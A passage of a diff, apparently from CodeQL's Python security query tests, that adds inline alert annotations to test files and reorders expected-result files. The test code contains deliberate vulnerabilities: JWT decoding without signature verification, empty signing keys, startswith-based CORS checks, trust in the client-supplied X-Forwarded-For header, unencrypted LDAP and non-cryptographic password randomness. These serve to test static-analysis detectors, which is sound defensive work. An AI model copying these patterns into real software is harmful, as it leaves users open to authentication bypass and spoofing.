a/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/test.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/test.py @@ -1,6 +1,6 @@ from azure.storage.blob import BlobServiceClient, ContainerClient, BlobClient -BSC = BlobServiceClient.from_connection_string(...) +BSC = BlobServiceClient.from_connection_string(...) # $ Source def unsafe(): # does not set encryption_version to 2.0, default is unsafe @@ -8,27 +8,27 @@ def unsafe(): blob_client.require_encryption = True blob_client.key_encryption_key = ... with open("decryptedcontentfile.txt", "rb") as stream: - blob_client.upload_blob(stream) # BAD + blob_client.upload_blob(stream) # BAD # $ Alert def unsafe_setting_on_blob_service_client(): - blob_service_client = BlobServiceClient.from_connection_string(...) + blob_service_client = BlobServiceClient.from_connection_string(...) # $ Source blob_service_client.require_encryption = True blob_service_client.key_encryption_key = ... blob_client = blob_service_client.get_blob_client(...) with open("decryptedcontentfile.txt", "rb") as stream: - blob_client.upload_blob(stream) + blob_client.upload_blob(stream) # $ Alert def unsafe_setting_on_container_client(): - container_client = ContainerClient.from_connection_string(...) + container_client = ContainerClient.from_connection_string(...) # $ Source container_client.require_encryption = True container_client.key_encryption_key = ... blob_client = container_client.get_blob_client(...) with open("decryptedcontentfile.txt", "rb") as stream: - blob_client.upload_blob(stream) + blob_client.upload_blob(stream) # $ Alert def potentially_unsafe(use_new_version=False): @@ -40,7 +40,7 @@ def potentially_unsafe(use_new_version=False): blob_client.encryption_version = '2.0' with open("decryptedcontentfile.txt", "rb") as stream: - blob_client.upload_blob(stream) # BAD + blob_client.upload_blob(stream) # BAD # $ Alert def safe(): @@ -72,7 +72,7 @@ def get_unsafe_blob_client(): def unsafe_with_calls(): bc = get_unsafe_blob_client() with open("decryptedcontentfile.txt", "rb") as stream: - bc.upload_blob(stream) # BAD + bc.upload_blob(stream) # BAD # $ Alert def get_safe_blob_client(): diff --git a/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.expected b/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.expected index 29ecd398a0af..da6e1c5aa1fd 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.expected @@ -1,6 +1,6 @@ +#select +| InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | Cryptographically insecure $@ in a security context. | InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | random value | edges nodes | InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | subpaths -#select -| InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | Cryptographically insecure $@ in a security context. | InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | random value | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.py b/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.py index 9f0439549672..ee94baf9eee1 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.py @@ -2,4 +2,4 @@ def generatePassword(): # BAD: the random is not cryptographically secure - return random.random() + return random.random() # $ Alert diff --git a/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.qlref b/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.qlref index 447fc2cf6b25..84cbc2412d91 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-338/InsecureRandomness.ql \ No newline at end of file +query: experimental/Security/CWE-338/InsecureRandomness.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-346/Cors.py b/python/ql/test/experimental/query-tests/Security/CWE-346/Cors.py index cc12e1273fbb..e01d99bde754 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-346/Cors.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-346/Cors.py @@ -4,8 +4,8 @@ def bad(): request = cherrypy.request validCors = "domain.com" if request.method in ['POST', 'PUT', 'PATCH', 'DELETE']: - origin = request.headers.get('Origin', None) - if origin.startswith(validCors): + origin = request.headers.get('Origin', None) # $ Source + if origin.startswith(validCors): # $ Alert print("Origin Valid") def good(): diff --git a/python/ql/test/experimental/query-tests/Security/CWE-346/CorsBypass.expected b/python/ql/test/experimental/query-tests/Security/CWE-346/CorsBypass.expected index 32d807c6f6e5..5816701791cf 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-346/CorsBypass.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-346/CorsBypass.expected @@ -1,3 +1,5 @@ +#select +| Cors.py:8:12:8:17 | ControlFlowNode for origin | Cors.py:7:18:7:32 | ControlFlowNode for Attribute | Cors.py:8:12:8:17 | ControlFlowNode for origin | Potentially incorrect string comparison which could lead to a CORS bypass. | edges | Cors.py:7:9:7:14 | ControlFlowNode for origin | Cors.py:8:12:8:17 | ControlFlowNode for origin | provenance | | | Cors.py:7:18:7:32 | ControlFlowNode for Attribute | Cors.py:7:18:7:52 | ControlFlowNode for Attribute() | provenance | Config | @@ -9,5 +11,3 @@ nodes | Cors.py:7:18:7:52 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | Cors.py:8:12:8:17 | ControlFlowNode for origin | semmle.label | ControlFlowNode for origin | subpaths -#select -| Cors.py:8:12:8:17 | ControlFlowNode for origin | Cors.py:7:18:7:32 | ControlFlowNode for Attribute | Cors.py:8:12:8:17 | ControlFlowNode for origin | Potentially incorrect string comparison which could lead to a CORS bypass. | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-346/CorsBypass.qlref b/python/ql/test/experimental/query-tests/Security/CWE-346/CorsBypass.qlref index b652fd93088b..35c42c39e854 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-346/CorsBypass.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-346/CorsBypass.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-346/CorsBypass.ql \ No newline at end of file +query: experimental/Security/CWE-346/CorsBypass.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-347/JWTEmptyKeyOrAlgorithm.qlref b/python/ql/test/experimental/query-tests/Security/CWE-347/JWTEmptyKeyOrAlgorithm.qlref index fe0d2ea00043..d225e37a0d38 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-347/JWTEmptyKeyOrAlgorithm.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-347/JWTEmptyKeyOrAlgorithm.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-347/JWTEmptyKeyOrAlgorithm.ql +query: experimental/Security/CWE-347/JWTEmptyKeyOrAlgorithm.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-347/JWTMissingSecretOrPublicKeyVerification.qlref b/python/ql/test/experimental/query-tests/Security/CWE-347/JWTMissingSecretOrPublicKeyVerification.qlref index d289ff151f42..38402ddd457b 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-347/JWTMissingSecretOrPublicKeyVerification.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-347/JWTMissingSecretOrPublicKeyVerification.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-347/JWTMissingSecretOrPublicKeyVerification.ql +query: experimental/Security/CWE-347/JWTMissingSecretOrPublicKeyVerification.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-347/authlib.py b/python/ql/test/experimental/query-tests/Security/CWE-347/authlib.py index 2f7367897033..94eb4a38c875 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-347/authlib.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-347/authlib.py @@ -8,8 +8,8 @@ JsonWebToken().encode({"alg": "HS256"}, token, "key") # bad - empty key -jwt.encode({"alg": "HS256"}, token, "") -JsonWebToken().encode({"alg": "HS256"}, token, "") +jwt.encode({"alg": "HS256"}, token, "") # $ Alert[py/jwt-empty-secret-or-algorithm] +JsonWebToken().encode({"alg": "HS256"}, token, "") # $ Alert[py/jwt-empty-secret-or-algorithm] # Decoding diff --git a/python/ql/test/experimental/query-tests/Security/CWE-347/pyjwt.py b/python/ql/test/experimental/query-tests/Security/CWE-347/pyjwt.py index 39892b33dcb9..c08375ef9f4f 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-347/pyjwt.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-347/pyjwt.py @@ -7,11 +7,11 @@ jwt.encode(token, key="key", algorithm="HS256") # bad - both key and algorithm set to None -jwt.encode(token, None, None) +jwt.encode(token, None, None) # $ Alert[py/jwt-empty-secret-or-algorithm] # bad - empty key -jwt.encode(token, "", algorithm="HS256") -jwt.encode(token, key="", algorithm="HS256") +jwt.encode(token, "", algorithm="HS256") # $ Alert[py/jwt-empty-secret-or-algorithm] +jwt.encode(token, key="", algorithm="HS256") # $ Alert[py/jwt-empty-secret-or-algorithm] # Decoding @@ -19,8 +19,8 @@ jwt.decode(token, "key", "HS256") # bad - unverified decoding -jwt.decode(token, verify=False) -jwt.decode(token, key, options={"verify_signature": False}) +jwt.decode(token, verify=False) # $ Alert[py/jwt-missing-verification] +jwt.decode(token, key, options={"verify_signature": False}) # $ Alert[py/jwt-missing-verification] # good - verified decoding jwt.decode(token, verify=True) diff --git a/python/ql/test/experimental/query-tests/Security/CWE-347/python_jose.py b/python/ql/test/experimental/query-tests/Security/CWE-347/python_jose.py index eeb050184d85..8c2bfe90879b 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-347/python_jose.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-347/python_jose.py @@ -7,8 +7,8 @@ jwt.encode(token, key="key", algorithm="HS256") # bad - empty key -jwt.encode(token, "", algorithm="HS256") -jwt.encode(token, key="", algorithm="HS256") +jwt.encode(token, "", algorithm="HS256") # $ Alert[py/jwt-empty-secret-or-algorithm] +jwt.encode(token, key="", algorithm="HS256") # $ Alert[py/jwt-empty-secret-or-algorithm] # Decoding @@ -16,7 +16,7 @@ jwt.decode(token, "key", "HS256") # bad - unverified decoding -jwt.decode(token, key, options={"verify_signature": False}) +jwt.decode(token, key, options={"verify_signature": False}) # $ Alert[py/jwt-missing-verification] # good - verified decoding jwt.decode(token, key, options={"verify_signature": True}) diff --git a/python/ql/test/experimental/query-tests/Security/CWE-347/python_jwt.py b/python/ql/test/experimental/query-tests/Security/CWE-347/python_jwt.py index 42a3fc35f075..77e67b2dd904 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-347/python_jwt.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-347/python_jwt.py @@ -11,4 +11,4 @@ def good(token): def bad(token): - python_jwt.process_jwt(token) + python_jwt.process_jwt(token) # $ Alert[py/jwt-missing-verification] diff --git a/python/ql/test/experimental/query-tests/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.expected b/python/ql/test/experimental/query-tests/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.expected index 1d529f3b3ea0..69e893a6f42d 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.expected @@ -1,3 +1,7 @@ +#select +| flask_bad.py:14:12:14:20 | ControlFlowNode for client_ip | flask_bad.py:13:17:13:54 | ControlFlowNode for Attribute() | flask_bad.py:14:12:14:20 | ControlFlowNode for client_ip | IP address spoofing might include code from $@. | flask_bad.py:13:17:13:54 | ControlFlowNode for Attribute() | this user input | +| flask_bad.py:21:12:21:20 | ControlFlowNode for client_ip | flask_bad.py:20:17:20:54 | ControlFlowNode for Attribute() | flask_bad.py:21:12:21:20 | ControlFlowNode for client_ip | IP address spoofing might include code from $@. | flask_bad.py:20:17:20:54 | ControlFlowNode for Attribute() | this user input | +| tornado_bad.py:23:16:23:24 | ControlFlowNode for client_ip | tornado_bad.py:22:25:22:69 | ControlFlowNode for Attribute() | tornado_bad.py:23:16:23:24 | ControlFlowNode for client_ip | IP address spoofing might include code from $@. | tornado_bad.py:22:25:22:69 | ControlFlowNode for Attribute() | this user input | edges | flask_bad.py:13:5:13:13 | ControlFlowNode for client_ip | flask_bad.py:14:12:14:20 | ControlFlowNode for client_ip | provenance | | | flask_bad.py:13:17:13:54 | ControlFlowNode for Attribute() | flask_bad.py:13:5:13:13 | ControlFlowNode for client_ip | provenance | | @@ -16,7 +20,3 @@ nodes | tornado_bad.py:22:25:22:69 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | tornado_bad.py:23:16:23:24 | ControlFlowNode for client_ip | semmle.label | ControlFlowNode for client_ip | subpaths -#select -| flask_bad.py:14:12:14:20 | ControlFlowNode for client_ip | flask_bad.py:13:17:13:54 | ControlFlowNode for Attribute() | flask_bad.py:14:12:14:20 | ControlFlowNode for client_ip | IP address spoofing might include code from $@. | flask_bad.py:13:17:13:54 | ControlFlowNode for Attribute() | this user input | -| flask_bad.py:21:12:21:20 | ControlFlowNode for client_ip | flask_bad.py:20:17:20:54 | ControlFlowNode for Attribute() | flask_bad.py:21:12:21:20 | ControlFlowNode for client_ip | IP address spoofing might include code from $@. | flask_bad.py:20:17:20:54 | ControlFlowNode for Attribute() | this user input | -| tornado_bad.py:23:16:23:24 | ControlFlowNode for client_ip | tornado_bad.py:22:25:22:69 | ControlFlowNode for Attribute() | tornado_bad.py:23:16:23:24 | ControlFlowNode for client_ip | IP address spoofing might include code from $@. | tornado_bad.py:22:25:22:69 | ControlFlowNode for Attribute() | this user input | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.qlref b/python/ql/test/experimental/query-tests/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.qlref index 2a1775fe06aa..51f11c6dfcdd 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.ql \ No newline at end of file +query: experimental/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-348/flask_bad.py b/python/ql/test/experimental/query-tests/Security/CWE-348/flask_bad.py index b357a9316fd0..491a13399706 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-348/flask_bad.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-348/flask_bad.py @@ -10,15 +10,15 @@ @app.route('/bad1') def bad1(): - client_ip = request.headers.get('x-forwarded-for') - if not client_ip.startswith('192.168.'): + client_ip = request.headers.get('x-forwarded-for') # $ Source + if not client_ip.startswith('192.168.'): # $ Alert raise Exception('ip illegal') return 'bad1' @app.route('/bad2') def bad2(): - client_ip = request.headers.get('x-forwarded-for') - if not client_ip == '127.0.0.1': + client_ip = request.headers.get('x-forwarded-for') # $ Source + if not client_ip == '127.0.0.1': # $ Alert raise Exception('ip illegal') return 'bad2' diff --git a/python/ql/test/experimental/query-tests/Security/CWE-348/tornado_bad.py b/python/ql/test/experimental/query-tests/Security/CWE-348/tornado_bad.py index 23ad29d8b09a..9899922d019b 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-348/tornado_bad.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-348/tornado_bad.py @@ -19,8 +19,8 @@ def get(self): if client_ip: client_ip = client_ip.split(',')[len(client_ip.split(',')) - 1] else: - client_ip = self.request.headers.get('REMOTE_ADDR', None) - if not client_ip == '127.0.0.1': + client_ip = self.request.headers.get('REMOTE_ADDR', None) # $ Source + if not client_ip == '127.0.0.1': # $ Alert raise Exception('ip illegal') self.write("hello.") diff --git a/python/ql/test/experimental/query-tests/Security/CWE-522-global-option/LdapInsecureAuth.expected b/python/ql/test/experimental/query-tests/Security/CWE-522-global-option/LdapInsecureAuth.expected index e217064d1dfc..58f42bec0c84 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-522-global-option/LdapInsecureAuth.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-522-global-option/LdapInsecureAuth.expected @@ -1,4 +1,4 @@ +#select edges nodes subpaths -#select diff --git a/python/ql/test/experimental/query-tests/Security/CWE-522-global-option/LdapInsecureAuth.qlref b/python/ql/test/experimental/query-tests/Security/CWE-522-global-option/LdapInsecureAuth.qlref index 7b867cb31867..cd63387a1a70 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-522-global-option/LdapInsecureAuth.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-522-global-option/LdapInsecureAuth.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-522/LdapInsecureAuth.ql +query: experimental/Security/CWE-522/LdapInsecureAuth.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-522/LdapInsecureAuth.expected b/python/ql/test/experimental/query-tests/Security/CWE-522/LdapInsecureAuth.expected index b07d47c203c5..63a573e7c088 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-522/LdapInsecureAuth.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-522/LdapInsecureAuth.expected @@ -1,3 +1,10 @@ +#select +| ldap2_remote.py:45:41:45:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:45:41:45:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:45:41:45:60 | ControlFlowNode for BinaryExpr | This LDAP host is authenticated insecurely. | +| ldap2_remote.py:56:41:56:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:56:41:56:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:56:41:56:60 | ControlFlowNode for BinaryExpr | This LDAP host is authenticated insecurely. | +| ldap3_remote.py:102:18:102:21 | ControlFlowNode for host | ldap3_remote.py:101:12:101:49 | ControlFlowNode for BinaryExpr | ldap3_remote.py:102:18:102:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | +| ldap3_remote.py:115:18:115:21 | ControlFlowNode for host | ldap3_remote.py:114:12:114:49 | ControlFlowNode for BinaryExpr | ldap3_remote.py:115:18:115:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | +| ldap3_remote.py:127:18:127:21 | ControlFlowNode for host | ldap3_remote.py:126:12:126:31 | ControlFlowNode for BinaryExpr | ldap3_remote.py:127:18:127:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | +| ldap3_remote.py:139:18:139:21 | ControlFlowNode for host | ldap3_remote.py:2:19:2:25 | ControlFlowNode for ImportMember | ldap3_remote.py:139:18:139:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | edges | ldap3_remote.py:2:19:2:25 | ControlFlowNode for ImportMember | ldap3_remote.py:2:19:2:25 | ControlFlowNode for request | provenance | | | ldap3_remote.py:2:19:2:25 | ControlFlowNode for request | ldap3_remote.py:138:21:138:27 | ControlFlowNode for request | provenance | | @@ -27,10 +34,3 @@ nodes | ldap3_remote.py:138:21:138:27 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | | ldap3_remote.py:139:18:139:21 | ControlFlowNode for host | semmle.label | ControlFlowNode for host | subpaths -#select -| ldap2_remote.py:45:41:45:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:45:41:45:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:45:41:45:60 | ControlFlowNode for BinaryExpr | This LDAP host is authenticated insecurely. | -| ldap2_remote.py:56:41:56:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:56:41:56:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:56:41:56:60 | ControlFlowNode for BinaryExpr | This LDAP host is authenticated insecurely. | -| ldap3_remote.py:102:18:102:21 | ControlFlowNode for host | ldap3_remote.py:101:12:101:49 | ControlFlowNode for BinaryExpr | ldap3_remote.py:102:18:102:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | -| ldap3_remote.py:115:18:115:21 | ControlFlowNode for host | ldap3_remote.py:114:12:114:49 | ControlFlowNode for BinaryExpr | ldap3_remote.py:115:18:115:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | -| ldap3_remote.py:127:18:127:21 | ControlFlowNode for host | ldap3_remote.py:126:12:126:31 | ControlFlowNode for BinaryExpr | ldap3_remote.py:127:18:127:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | -| ldap3_remote.py:139:18:139:21 | ControlFlowNode for host | ldap3_remote.py:2:19:2:25 | ControlFlowNode for ImportMember | ldap3_remote.py:139:18:139:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-522/LdapInsecureAuth.qlref b/python/ql/test/experimental/query-tests/Security/CWE-522/LdapInsecureAuth.qlref index 7b867cb31867..cd63387a1a70 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-522/LdapInsecureAuth.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-522/LdapInsecureAuth.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-522/LdapInsecureAuth.ql +query: experimental/Security/CWE-522/LdapInsecureAuth.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-522/ldap2_remote.py b/python/ql/test/experimental/query-tests/Security/CWE-522/ldap2_remote.py index 3119ca2d28a7..75f5b0b0ea34 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-522/ldap2_remote.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-522/ldap2_remote.py @@ -42,7 +42,7 @@ def two(): @app.route("/one_bad") def one_bad(): - ldap_connection_7 = ldap.initialize(schema + remote_host) + ldap_connection_7 = ldap.initialize(schema + remote_host) # $ Alert ldap_connection_7.set_option(ldap.OPT_X_TLS_DEMAND, False) ldap_connection_7.simple_bind_s('', '') user = ldap_connection_7.search_s( @@ -53,7 +53,7 @@ def one_bad(): @app.route("/one_bad_2") def one_bad_2(): - ldap_connection_8 = ldap.initialize(schema + remote_host) + ldap_connection_8 = ldap.initialize(schema + remote_host) # $ Alert ldap_connection_8.set_option(ldap.OPT_X_TLS_NEVER, True) ldap_connection_8.simple_bind_s('', '') user = ldap_connection_8.search_s( diff --git a/python/ql/test/experimental/query-tests/Security/CWE-522/ldap3_remote.py b/python/ql/test/experimental/query-tests/Security/CWE-522/ldap3_remote.py index 269e03e41fef..ff5c5998ec23 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-522/ldap3_remote.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-522/ldap3_remote.py @@ -1,5 +1,5 @@ from ldap3 import Server, Connection, ALL -from flask import request, Flask +from flask import request, Flask # $ Source app = Flask(__name__) @@ -98,8 +98,8 @@ def seven(): @app.route("/eight") def eight(): - host = schema + "somethingon.theinternet.com" - srv = Server(host, port=1337) + host = schema + "somethingon.theinternet.com" # $ Source + srv = Server(host, port=1337) # $ Alert conn = Connection(srv, "dn", "password") conn.start_tls() conn.search("dn", "search_filter") @@ -111,8 +111,8 @@ def eight(): @app.route("/nine") def nine(): - host = schema + "somethingon.theinternet.com" - srv = Server(host, 1337, False) + host = schema + "somethingon.theinternet.com" # $ Source + srv = Server(host, 1337, False) # $ Alert conn = Connection(srv, "dn", "password") conn.search("dn", "search_filter") return conn.response @@ -123,8 +123,8 @@ def nine(): @app.route("/ten") def ten(): - host = schema + remote_host - srv = Server(host, port=1337, use_ssl=False) + host = schema + remote_host # $ Source + srv = Server(host, port=1337, use_ssl=False) # $ Alert conn = Connection(srv, "dn", "password") conn.search("dn", "search_filter") return conn.response @@ -136,7 +136,7 @@ def ten(): @app.route("/eleven") def eleven(): host = schema + request.args['host'] - srv = Server(host, port=1337) + srv = Server(host, port=1337) # $ Alert conn = Connection(srv, "dn", "password") conn.search("dn", "search_filter") return conn.response diff --git a/python/ql/test/experimental/query-tests/Security/CWE-611-SimpleXmlRpcServer/SimpleXmlRpcServer.qlref b/python/ql/test/experimental/query-tests/Security/CWE-611-SimpleXmlRpcServer/SimpleXmlRpcServer.qlref index a0b30e6d69b8..f9b2ebd03909 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-611-SimpleXmlRpcServer/SimpleXmlRpcServer.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-611-SimpleXmlRpcServer/SimpleXmlRpcServer.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-611/SimpleXmlRpcServer.ql +query: experimental/Security/CWE-611/SimpleXmlRpcServer.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-611-SimpleXmlRpcServer/xmlrpc_server.py b/python/ql/test/experimental/query-tests/Security/CWE-611-SimpleXmlRpcServer/xmlrpc_server.py index 83c18b549b3d..f2463a752bcb 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-611-SimpleXmlRpcServer/xmlrpc_server.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-611-SimpleXmlRpcServer/xmlrpc_server.py @@ -4,7 +4,7 @@ def foo(n: str): print("foo called with arg:", n, type(n)) return "ok" -server = SimpleXMLRPCServer(("127.0.0.1", 8000)) +server = SimpleXMLRPCServer(("127.0.0.1", 8000)) # $ Alert server.register_function(foo, "foo") server.serve_forever() diff --git a/python/ql/test/experimental/query-tests/Security/CWE-770/UnicodeDoS.expected b/python/ql/test/experimental/query-tests/Security/CWE-770/UnicodeDoS.expected index 430e7558fdc6..0ef7b8b43b79 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-770/UnicodeDoS.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-770/UnicodeDoS.expected @@ -1,3 +1,10 @@ +#select +| tests.py:16:39:16:47 | ControlFlowNode for file_path | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:16:39:16:47 | ControlFlowNode for file_path | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:16:39:16:47 | ControlFlowNode for file_path | costly Unicode normalization operation | +| tests.py:28:43:28:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:28:43:28:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:28:43:28:43 | ControlFlowNode for r | costly Unicode normalization operation | +| tests.py:40:43:40:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:40:43:40:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:40:43:40:43 | ControlFlowNode for r | costly Unicode normalization operation | +| tests.py:52:43:52:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:52:43:52:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:52:43:52:43 | ControlFlowNode for r | costly Unicode normalization operation | +| tests.py:64:43:64:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:64:43:64:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:64:43:64:43 | ControlFlowNode for r | costly Unicode normalization operation | +| tests.py:76:43:76:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:76:43:76:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:76:43:76:43 | ControlFlowNode for r | costly Unicode normalization operation | edges | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:1:35:1:41 | ControlFlowNode for request | provenance | | | tests.py:1:35:1:41 | ControlFlowNode for request | tests.py:12:17:12:23 | ControlFlowNode for request | provenance | | @@ -64,10 +71,3 @@ nodes | tests.py:72:9:72:33 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | tests.py:76:43:76:43 | ControlFlowNode for r | semmle.label | ControlFlowNode for r | subpaths -#select -| tests.py:16:39:16:47 | ControlFlowNode for file_path | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:16:39:16:47 | ControlFlowNode for file_path | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:16:39:16:47 | ControlFlowNode for file_path | costly Unicode normalization operation | -| tests.py:28:43:28:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:28:43:28:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:28:43:28:43 | ControlFlowNode for r | costly Unicode normalization operation | -| tests.py:40:43:40:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:40:43:40:43 | ControlFlowNode for r | This $@ can reach a $@. | 